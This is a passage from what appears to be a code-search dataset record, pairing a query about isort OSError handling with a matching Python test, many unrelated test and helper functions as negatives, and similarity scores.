line = next(iterator)\n \n entries.update({\"huffman_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_num_loops\":int(re.search(r'\\d+', line).group())})\n\n\n if \"NEURAL NET\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"nnet\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"nnet_num_loops\":int(re.search(r'\\d+', line).group())})\n\n if \"LU DECOMPOSITION\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"lu_decomp\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"lu_decomp_num_arrs\":int(re.search(r'\\d+', line).group())})\n\n if \"libc\" in line and \"Baseline\" not in line and \"*\" not in line:\n line = next(iterator)\n \n entries.update({\"memory_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n 
entries.update({\"integer_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"float_index\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n\n #print(entries)\n return entries", "def test_basic_parser_trace():", "def test_bad_date():\n assert sort_memos(bad_record) == 'Error'", "def test_traffic_analysis_human_readable(\n traffic_analysis_success, traffic_analysis_success_hr\n):\n resp = prepare_traffic_analysis_output(traffic_analysis_success)\n assert resp == traffic_analysis_success_hr", "def _compare_output(standart_output, testing_output):\n standart_output_array = standart_output.splitlines()\n testing_output_array = testing_output.splitlines()\n standart_output_array_len = len(standart_output_array)\n testing_output_array_len = len(testing_output_array)\n\n if standart_output_array_len != testing_output_array_len:\n print 'there is different count of steps standart: ', standart_output_array_len, \\\n ' testing: ', testing_output_array_len\n return False\n\n for index in range(0, len(standart_output_array), 1):\n if standart_output_array[index] != testing_output_array[index]:\n print 'there is different results in same step for standsret: ', standart_output_array[index], \\\n ' and testing: ', testing_output_array[index]\n return False\n\n return True", "def test_get_sort_info(self):\n ars = self.ar[2009][11]['day']\n self.assertEqual(ars.get_sort_info(), (31, 'key', True))", "def test_invalid_args(self):\n self.assertEqual(dictsort([{}], \"._private\"), \"\")\n self.assertEqual(dictsort([{\"_private\": \"test\"}], \"_private\"), \"\")\n self.assertEqual(\n dictsort([{\"nested\": {\"_private\": \"test\"}}], \"nested._private\"), \"\"\n )", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def check_sort(self):\n if self.list == []:\n return True\n seg_iter = iter(self.list)\n last = next(seg_iter)\n for segment in seg_iter:\n if last > segment:\n raise Exception('non trié')\n last = segment\n return True", "def pass_test(sort_func, arr):\n sort_array = sorted(arr[:])\n # Print accordingly\n if sort_func(arr[:]) == sort_array:\n print(\"Test Passed\")\n else:\n print(\"Error: Test not passed\")", "def check_input_matches_expected_output(in_, out):\n ...", "def test_merge(self):\n integers = merge_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_rust_code_analysis_tokei_c() -> None:\n\n ret_value = compare(\n \"rust-code-analysis\",\n \"tokei\",\n [\"-g\", \"-f\"],\n [\"SLOC\", \"PLOC\", \"CLOC\", \"BLANK\"],\n \"C\",\n \"bubble_sort.c\",\n )\n\n assert ret_value == 0", "def test_isort_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(\n 0, \"\", output=\"mocked error\"\n )\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert len(issues) == 1", "def test__parse_archived():\n for 
input_data, expected_output in (\n ({}, False),\n ({'thread_metadata': {}}, False),\n ({'thread_metadata': {'archived': False}}, False),\n ({'thread_metadata': {'archived': True}}, True),\n ):\n output = parse_archived(input_data)\n vampytest.assert_eq(output, expected_output)", "def test_output(self):\n good_value_pairs = INT_VALUE_PAIRS\n for pair in good_value_pairs:\n output = to_cardinal_number(pair[0])\n self.assertEqual(output, pair[1],\n f\"{pair[0]} should be {pair[1]}, not {output}\")", "def test_parse_sort(self):\n old_type = Sort('sort', [\n Relationship('student', PersonSchema(), None),\n Relationship('school', StudentSchema(), None)],\n Attribute('title', SchoolSchema(), None), '+')\n new_type = self.driver.parse(old_type)\n\n assert new_type.source == old_type\n assert old_type.relationships != new_type.relationships\n assert isinstance(new_type.relationships[0], Mapper)\n assert old_type.attribute != new_type.attribute\n assert isinstance(new_type.attribute, Column)\n assert old_type.direction == new_type.direction", "def test_make_tool_plugin_parse_invalid():\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n output = \"invalid text\"\n issues = mtp.parse_output(package, output)\n assert not issues", "def test_sort_inputs_0a6a357e(self):\n inputs = bip69.get_inputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_inputs = bip69.sort_inputs(inputs)\n self.assertEqual(bip69_inputs[0],\n (('0e53ec5dfb2cb8a71fec32dc9a634a35b7e24799295ddd52782'\n '17822e0b31f57'), 0))\n self.assertEqual(bip69_inputs[10],\n (('7d037ceb2ee0dc03e82f17be7935d238b35d1deabf953a892a4'\n '507bfbeeb3ba4'), 1))", "def check_correctness(self):\n\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = gt_file.readlines()\n\n # Check for inequality\n if len(out_lines) != len(gt_lines):\n return 0\n\n # Check for inequality\n for i in range(len(out_lines)):\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n\n return 1", "def test_radix(self):\n integers = radix_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_asciitable_m_pure_ascii(self):\n input = '''\n+========+========+========+========+========+========+========+\n| type | tota | used | fr ee | shar | buff | avai |\n| | l | | | ed | _cac | labl |\n| | | | | | he | e |\n+========+========+========+========+========+========+========+\n| Mem | 3861 | 2228 | 3364 | 1183 | 2743 | 3389 |\n| | 332 | 20 | 176 | 2 | 36 | 588 |\n+--------+--------+--------+--------+--------+--------+--------+\n| | | | | | | |\n| | | | | test 2 | | |\n+--------+--------+--------+--------+--------+--------+--------+\n| last | last | last | ab cde | | | final |\n+========+========+========+========+========+========+========+\n '''\n expected = [\n {\n \"type\": \"Mem\",\n \"tota_l\": \"3861\\n332\",\n \"used\": \"2228\\n20\",\n \"fr_ee\": \"3364\\n176\",\n \"shar_ed\": \"1183\\n2\",\n \"buff_cac_he\": \"2743\\n36\",\n \"avai_labl_e\": \"3389\\n588\"\n },\n {\n \"type\": None,\n \"tota_l\": None,\n \"used\": None,\n \"fr_ee\": None,\n \"shar_ed\": \"test 2\",\n \"buff_cac_he\": None,\n 
\"avai_labl_e\": None\n },\n {\n \"type\": \"last\",\n \"tota_l\": \"last\",\n \"used\": \"last\",\n \"fr_ee\": \"ab cde\",\n \"shar_ed\": None,\n \"buff_cac_he\": None,\n \"avai_labl_e\": \"final\"\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def test_basic_parsers():", "def validate(self):\n if len(self.independent_nodes) > 0:\n try:\n self.topological_sort()\n return True\n except ValueError:\n return False\n return False", "def test_convert(self):\n out_text = StringIO()\n with redirect_stdout(out_text):\n main([\"-id\", indir, \"-od\", compdir, \"-if\", \"ttl\", \"-of\", \"json-ld\"])\n self.assertEqual(\"\"\"Total=3 Successful=3\"\"\", out_text.getvalue().strip())", "def test_sorted_page_stream(self):\n self._test_insertion(Macros, 0)", "def test_heap_sort(self):\n integers = heap_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_inflate_denoiser_output(self):\r\n actual = list(inflate_denoiser_output(\r\n parse_fasta(self.centroid_seqs1),\r\n parse_fasta(self.singleton_seqs1),\r\n self.denoiser_mapping1,\r\n parse_fasta(self.raw_seqs1)))\r\n expected = [(\"S1_0 FXX111 some comments\", \"TTTT\"),\r\n (\"S1_2 FXX113 some other comments\", \"TTTT\"),\r\n (\"S3_7 FXX117\", \"TTTT\"),\r\n (\"S2_1 FXX112 some comments\", \"TATT\"),\r\n (\"S3_5 FXX114\", \"TATT\"),\r\n (\"S3_6 FXX115\", \"TTGA\"),\r\n (\"S3_6 FXX116\", \"TAGA\")]\r\n self.assertEqual(actual, expected)", "def main(argv):\r\n\terror_code = 0\r\n\tlist = [5, 9, 8, 2, 0, 4, 7, 6, 1, 7]\r\n\tprint('Unsorted list:')\r\n\tprint(list)\r\n\tlist = selection_sort(list)\r\n\tprint('Sorted list:')\r\n\tprint(list)\r\n\treturn error_code", "def _fix_shortsort(self):\n test_dir = join_path(self.install_test_root, self.test_src_dir)\n filter_file(\"../src/\", \"\", join_path(test_dir, \"testshortsort.sh\"))", "def test_print_result(capsys):\n assert \"\"\"Total 5 hands solved\nTotal 4 hands solved with hint\nTotal 4 hands failed to solve\"\"\" in hl.test_help_print_result(capsys)", "def test_parse_results_error():\n error_result = [{\"error\": \"test\"}]\n assert [{\"title\": \"Error\",\n \"subtitle\": \"test\",\n \"valid\": False}] == parse_results(error_result)", "def test_workloads_list_command_human_readable(\n workloads_list_success, workloads_list_success_hr\n):\n hr_output = prepare_workloads_list_output(workloads_list_success)\n assert hr_output == workloads_list_success_hr", "def test_sort_success_return_sortedArray(self):\n\n # prepare\n unsortedArray = [12.0, 13.5, 1.0, 5.5,\n 9.0, 19.5, 12.0, 23.5, 5.0, 51.0]\n expectedResult = [1.0, 5.0, 5.5, 9.0,\n 12.0, 12.0, 13.5, 19.5, 23.5, 51.0]\n\n # execute\n actuatlResponse = PSPQuickSortProcess.sort(unsortedArray)\n\n # assert\n self.assertEqual(expectedResult, actuatlResponse)", "def test_sort_natural(self):\n\n test_cases = [\n Case(\n description=\"lists of strings\",\n val=[\"b\", \"a\", \"C\", \"B\", \"A\"],\n args=[],\n kwargs={},\n expect=[\"a\", \"A\", \"b\", \"B\", \"C\"],\n ),\n Case(\n description=\"lists of strings with a None\",\n val=[\"b\", \"a\", None, \"C\", \"B\", \"A\"],\n args=[],\n kwargs={},\n expect=[None, \"a\", \"A\", \"b\", \"B\", \"C\"],\n ),\n Case(\n description=\"lists of objects with key\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[\"title\"],\n kwargs={},\n expect=[{\"title\": \"bar\"}, {\"title\": \"Baz\"}, {\"title\": \"foo\"}],\n ),\n Case(\n description=\"lists of objects with missing key\",\n val=[{\"title\": \"foo\"}, {\"title\": 
\"bar\"}, {\"heading\": \"Baz\"}],\n args=[\"title\"],\n kwargs={},\n expect=[{\"title\": \"bar\"}, {\"title\": \"foo\"}, {\"heading\": \"Baz\"}],\n ),\n Case(\n description=\"empty list\",\n val=[],\n args=[],\n kwargs={},\n expect=[],\n ),\n Case(\n description=\"too many arguments\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[\"title\", \"heading\"],\n kwargs={},\n expect=FilterArgumentError,\n ),\n Case(\n description=\"value not an array\",\n val=1234,\n args=[],\n kwargs={},\n expect=FilterValueError,\n ),\n Case(\n description=\"undefined left value\",\n val=self.env.undefined(\"test\"),\n args=[],\n kwargs={},\n expect=[],\n ),\n Case(\n description=\"undefined argument\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[self.env.undefined(\"test\")],\n kwargs={},\n expect=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n ),\n ]\n\n self._test(SortNatural, test_cases)", "def test_asciitable_m_pure_ascii_extra_spaces(self):\n input = '''\n \n \n +========+========+========+========+========+========+========+\n | type | tota | used | fr ee | shar | buff | avai \n | | l | | | ed | _cac | labl \n | | | | | | he | e |\n +========+========+========+========+========+========+========+ \n | Mem | 3861 | 2228 | 3364 | 1183 | 2743 | 3389 |\n | | 332 | 20 | 176 | 2 | 36 | 588 |\n +--------+--------+--------+--------+--------+--------+--------+\n | | | | | | | |\n | | | | | test 2 | | | \n +--------+--------+--------+--------+--------+--------+--------+\n | last | last | last | ab cde | | | final \n +========+========+========+========+========+========+========+ \n \n \n '''\n expected = [\n {\n \"type\": \"Mem\",\n \"tota_l\": \"3861\\n332\",\n \"used\": \"2228\\n20\",\n \"fr_ee\": \"3364\\n176\",\n \"shar_ed\": \"1183\\n2\",\n \"buff_cac_he\": \"2743\\n36\",\n \"avai_labl_e\": \"3389\\n588\"\n },\n {\n \"type\": None,\n \"tota_l\": None,\n \"used\": None,\n \"fr_ee\": None,\n \"shar_ed\": \"test 2\",\n \"buff_cac_he\": None,\n \"avai_labl_e\": None\n },\n {\n \"type\": \"last\",\n \"tota_l\": \"last\",\n \"used\": \"last\",\n \"fr_ee\": \"ab cde\",\n \"shar_ed\": None,\n \"buff_cac_he\": None,\n \"avai_labl_e\": \"final\"\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def test_invalid_values(self):\n self.assertEqual(dictsort([1, 2, 3], \"age\"), \"\")\n self.assertEqual(dictsort(\"Hello!\", \"age\"), \"\")\n self.assertEqual(dictsort({\"a\": 1}, \"age\"), \"\")\n self.assertEqual(dictsort(1, \"age\"), \"\")", "def test_update_enforcement_mode_command_failure_human_readable(\n enforcement_mode_failure_hr, enforcement_mode_failure_expected\n):\n resp = prepare_update_enforcement_mode_output(enforcement_mode_failure_expected)\n\n assert resp == enforcement_mode_failure_hr", "def test_natsort_case_insensitive(self):\r\n\r\n # string with alpha and numerics sort correctly\r\n s = [\r\n 'sample1',\r\n 'sample2',\r\n 'sample11',\r\n 'sample12',\r\n 'SAmple1',\r\n 'Sample2']\r\n\r\n # expected values\r\n exp_natsort = ['SAmple1', 'Sample2', 'sample1', 'sample2', 'sample11',\r\n 'sample12']\r\n exp_natsort_case_insensitive = ['sample1', 'SAmple1', 'sample2',\r\n 'Sample2', 'sample11', 'sample12']\r\n\r\n # test natsort\r\n self.assertEqual(natsort(s), exp_natsort)\r\n # test natsort_case_insensitive\r\n self.assertEqual(natsort_case_insensitive(s),\r\n exp_natsort_case_insensitive)\r\n\r\n s.reverse()\r\n # test natsort\r\n self.assertEqual(natsort(s), 
exp_natsort)\r\n # test natsort_case_insensitive\r\n self.assertEqual(natsort(list('cbaA321')), list('123Aabc'))\r\n\r\n # strings with alpha only sort correctly\r\n self.assertEqual(natsort_case_insensitive(list('cdBa')), list('aBcd'))\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort_case_insensitive(['11', '2', '1', '0']),\r\n ['0', '1', '2', '11'])\r\n\r\n # strings of floats sort correctly\r\n self.assertEqual(natsort_case_insensitive(['1.11', '1.12', '1.00',\r\n '0.009']), ['0.009', '1.00',\r\n '1.11', '1.12'])\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort_case_insensitive([('11', 'A'), ('2', 'B'),\r\n ('1', 'C'), ('0', 'D')]),\r\n [('0', 'D'), ('1', 'C'),\r\n ('2', 'B'), ('11', 'A')])", "def test_parse_output_error(self):\n self.assertRaises(ValueError,\n parse_output,\n hgt_results_fp=self.consel_output_hgt_fp,\n method=\"Consel\")", "def test_correct_parsing(self):\n test_length = random.randint(0,100)\n test_string = \"#\\t{0}\".format(\"\\t\".join(map(str, xrange(test_length))))\n expected = [extract_mock(s) for s in xrange(test_length)]\n computed = self.parser.parse_header(test_string, extract_mock)\n self.assertEquals(expected, computed)", "def test_parser_all(self):\n args = [\"directory\", \"-n\", \"-f\", \"-r\"]\n parser = setup_parser()\n output = parser.parse_args(args)\n self.assertEqual(output.directory, \"directory\")\n self.assertFalse(output.colorize)\n self.assertTrue(output.fancy)\n self.assertTrue(output.reverse)", "def main(argv):\r\n\terror_code = 0\r\n\tlist = [5, 9, 8, 2, 0, 4, 7, 6, 1, 7]\r\n\tprint('Unsorted list:')\r\n\tprint(list)\r\n\tlist = quick_sort(list)\r\n\tprint('Sorted list:')\r\n\tprint(list)\r\n\treturn error_code", "def check(self, input, ast):\n assert False # Must be redefined", "def test_reversed_version_sorting(self):\n assert natsort(['1', '5', '10', '50'], reverse=True) == ['50', '10', '5', '1']", "def check_cot_output(self, expected):\n sys.stdout = StringIO.StringIO()\n output = None\n try:\n self.instance.run()\n except (TypeError, ValueError, SyntaxError, LookupError):\n self.fail(traceback.format_exc())\n finally:\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n self.maxDiff = None\n self.assertMultiLineEqual(expected.strip(), output.strip())", "def test_sam_parser_success(self):\n # self.cleanup = False\n\n sam_file = '%s/../human_100.sam' % GOLDEN_DIR\n count = 0\n\n with open(sam_file, 'r') as sam:\n for line in sam:\n # Skip tags\n if line[0] == '@':\n continue\n\n alignment = parse_sam_line(line)\n\n # Verify that the type conversions are all correct\n types = {}\n for entry in sam_format():\n types[entry['name']] = entry['type']\n\n for field in alignment:\n self.assertIs(type(alignment[field]), types[field])\n\n count = count + 1\n\n self.assertEqual(count, 100)" ]
[ "0.6781174", "0.6635181", "0.6309134", "0.62981886", "0.61402726", "0.6060493", "0.60508925", "0.59607303", "0.5936084", "0.59126383", "0.587762", "0.58522105", "0.5729688", "0.56102586", "0.5577316", "0.55231833", "0.5521064", "0.55136585", "0.55019987", "0.54842657", "0.5482111", "0.5479343", "0.54657125", "0.54582775", "0.54581916", "0.54488796", "0.5425367", "0.54231393", "0.5421183", "0.5408248", "0.5405454", "0.5381841", "0.5372667", "0.5368157", "0.5366018", "0.5357217", "0.53548884", "0.53300023", "0.5320169", "0.5312435", "0.5308419", "0.53077173", "0.53075135", "0.53067285", "0.5306131", "0.53045064", "0.5294904", "0.5293883", "0.52787155", "0.52369976", "0.52369505", "0.5235237", "0.5232342", "0.52092105", "0.5207558", "0.51853544", "0.5180541", "0.51695865", "0.5168456", "0.5165643", "0.5161634", "0.51588595", "0.5155746", "0.5155369", "0.51551974", "0.51461416", "0.5120987", "0.5106656", "0.5105906", "0.5097108", "0.5094501", "0.50900066", "0.5087463", "0.50844145", "0.50786316", "0.5071691", "0.5066559", "0.50514275", "0.50492316", "0.5048198", "0.50476885", "0.5047438", "0.50459206", "0.50456524", "0.50431645", "0.5042678", "0.5036043", "0.5035931", "0.50309134", "0.5021781", "0.50148034", "0.49965024", "0.49937817", "0.49921626", "0.49920163", "0.4990554", "0.49901894", "0.49876922", "0.4986972", "0.49865675" ]
0.77473277
0
Test what happens when an OSError is raised (usually means isort doesn't exist).
def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output): mock_subprocess_check_output.side_effect = OSError("mocked error") itp = setup_isort_tool_plugin() package = Package( "valid_package", os.path.join(os.path.dirname(__file__), "valid_package") ) package["python_src"] = [ os.path.join(os.path.dirname(__file__), "valid_package", "sample.py") ] issues = itp.scan(package, "level") assert not issues
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def os_error():\n en = ctypes.get_errno()\n ctypes.set_errno(0)\n if en == 0:\n return OSError(en, \"(no errno found)\")\n else:\n return OSError(en, errno.errorcode[en])", "def test_dump_handles_os_error(mocker):\n\tmocker.patch('subprocess.Popen', side_effect=OSError('no such file'))\n\twith pytest.raises(SystemExit):\n\t\tpgdump.dump(url)", "def test_load_json_os_error() -> None:\n fname = \"/\"\n with pytest.raises(HomeAssistantError) as err:\n load_json(fname)\n assert isinstance(err.value.__cause__, OSError)", "def test_dump_handles_oserror(mocker):\n mocker.patch('subprocess.Popen' , side_effect=OSError(\"no such file\"))\n with pytest.raises(SystemExit):\n pgdump.dump(url)", "def test_make_sure_path_exists_correctly_handle_os_error(mocker):\n mocker.patch(\"pathlib.Path.mkdir\", side_effect=OSError)\n with pytest.raises(OSError) as err:\n utils.make_sure_path_exists(Path('protected_path'))\n assert str(err.value) == \"Unable to create directory at protected_path\"", "def _check_error(return_value):\n if return_value < 0:\n raise IOError(pm.lib.Pm_GetErrorText(return_value))", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n SshErrorExitCodeController(255, ERROR_MESSAGE)\\\n .check_if_error()", "def test_make_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError('mocked error')\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert issues is None", "def _check(error: int) -> None:\n if error < 0:\n raise RuntimeError(ffi.string(lib.TCOD_get_error()).decode())", "def test_shell_bad_command():\n out, err = shell_command(\"ls adasdasdas\")\n assert out is None\n assert \"adasdasdas\" in err", "def _file_does_not_exist_error(exception):\n stre = str(exception)\n # return any(err in stre for err in (\"ENOENT\", \"ENODEV\", \"EINVAL\"))\n return any(err in stre for err in (\"ENOENT\", \"ENODEV\", \"EINVAL\"))", "def suppress_oserror(*errnos):\n try:\n yield\n except OSError as e:\n if e.errno not in errnos:\n raise e", "def walk_error(os_error):\n printer(\"Cannot access '{}'; zip creation aborted\".format(os_error.filename), \"error\", True)\n raise os_error", "def test_missing_file():\n passed = False\n try:\n x = XPIManager('foo.bar')\n except:\n passed = True\n assert passed", "def test_missing_file(self):\n with self.assertRaises(subprocess.CalledProcessError) as cm:\n subprocess.check_output(\n [sys.executable, idf_py_path, '--version', '@args_non_existent'],\n env=os.environ,\n stderr=subprocess.STDOUT).decode('utf-8', 'ignore')\n self.assertIn('(expansion of @args_non_existent) could not be opened', cm.exception.output.decode('utf-8', 'ignore'))", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_invalid_path() -> None:\n path = rsc / \"does-not-exist.ods\"\n with pytest.raises(FileNotFoundError, match=\"does not exist\"):\n read_ods(path)", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_option_unhandled(self):\n cmd, output = runCmdOutput(['--__unhandled__'])\n self.assertEqual(cmd.returncode, os.EX_USAGE)", "def test_existing_file_after_assert_error(exist_of_file):\n try:\n assert read_magic_number(exist_of_file)\n except AssertionError:\n 
print(\"Now lets do check of existing file\")", "def test_exceptions():\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.connect(path=r\"No process with this please\")\r\n assert False\r\n except application.ProcessNotFoundError:\r\n print('ProcessNotFoundError has been raised. OK.')\r\n\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.start(cmd_line = r\"No process with this please\")\r\n assert False\r\n except application.AppStartError:\r\n print('AppStartError has been raised. OK.')", "def test_check_if_not_error(self):\n actual_result = SshErrorExitCodeController(ERROR_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def _errcheck_link(value, func, args): # pylint: disable=W0613\n # The windows api returns nonzero if the call was successful\n if value != 0:\n return\n\n last_error = ctypes.windll.kernel32.GetLastError()\n # Somehow CreateSymbolicLinkW and CreateHardLinkW retuns zero\n # and the last error is 2 (The system cannot find the file specified)\n # but the link is created successfuly\n # it seems like a bug in the WinAPI\n if last_error == 0 or last_error == 2:\n return\n if last_error == 183:\n raise OSError(errno.EEXIST,\n \"Cannot create a file when that file already exists\",\n args[0])", "def test_bad_file() -> None:\n\n bad = random_string()\n rv, out = getstatusoutput(f'{RUN} {bad}')\n assert rv != 0\n assert out.lower().startswith('usage:')\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def test_check_if_error_one(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def test_check_if_not_error(self):\n actual_result = SshErrorExitCodeController(OK_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def test_no_such_file(self):\n\t\twith self.assertRaises(IOError):\n\t\t\tanalyse_text('foobar')", "def test_watch_raises(capsys):\n with mock.patch('uflash.watch_file', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--watch', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error watching test.py'\n assert expected in stderr", "def convert_oserror(exc, pid=None, name=None):\n assert isinstance(exc, OSError), exc\n if is_permission_err(exc):\n return AccessDenied(pid=pid, name=name)\n if exc.errno == errno.ESRCH:\n return NoSuchProcess(pid=pid, name=name)\n raise exc", "def raise_for_darwin_exception(response: requests.Response) -> None:\n if response.status_code == 200:\n return\n if response.status_code == 401:\n raise Unauthorized(response)\n if response.status_code == 404:\n raise NotFound(response)", "def check_platform():\n if os.getcwd() != os.path.dirname(os.path.abspath(__file__)):\n error = \"must be ran in the directory it's located at\"\n if os.path.sep != '/':\n error = \"a unix-like operating system is required\"\n elif not shutil.which('dpkg-deb'):\n error = \"cannot find dpkg-deb\"\n elif os.getuid() != 0:\n error = \"must be ran as root (or with fakeroot)\"\n else:\n return\n sys.exit(\"{}: error: {}\".format(sys.argv[0], error))", "def test_info_fail(self):\n path = \"non_existing_audio.wav\"\n with self.assertRaisesRegex(RuntimeError, path):\n self._info(path)", "def test_NameError(n=2):\n\n p = platform_name()\n\n try:\n p.result()\n except NameError:\n print(\"Caught NameError\")\n else:\n 
assert False, \"Raise the wrong Error\"", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n ExecutionExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def test_exit_on_missing_file(self):\n with self.assertRaises(SystemExit):\n pyint = Interpreter()\n pyint.run(file=MISSING_FILE)", "def test_unexpected_error_in_exists(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggyExistsResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while checking existence of '\n 'output resources' ) >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in exists()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def test_noreleaseerror_raise(self, mock_path, mock_open, mock_error):\n # Set the mocked functions returned values\n mock_path.isfile.side_effect = [True]\n mock_context_manager = mock.Mock()\n mock_open.return_value = mock_context_manager\n mock_file = mock.Mock()\n mock_file.read.return_value = \"WRONG\"\n mock_enter = mock.Mock()\n mock_enter.return_value = mock_file\n mock_exit = mock.Mock()\n setattr(mock_context_manager, \"__enter__\", mock_enter)\n setattr(mock_context_manager, \"__exit__\", mock_exit)\n\n # Test execution\n ConnectomistWrapper._connectomist_version_check(\"/my/path/mock_conf\")\n self.assertEqual(len(mock_error.call_args_list), 1)", "def testError(self):\n cmds = \"\"\"chown 0 missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def is_permission_err(exc):\n assert isinstance(exc, OSError), exc\n # On Python 2 OSError doesn't always have 'winerror'. 
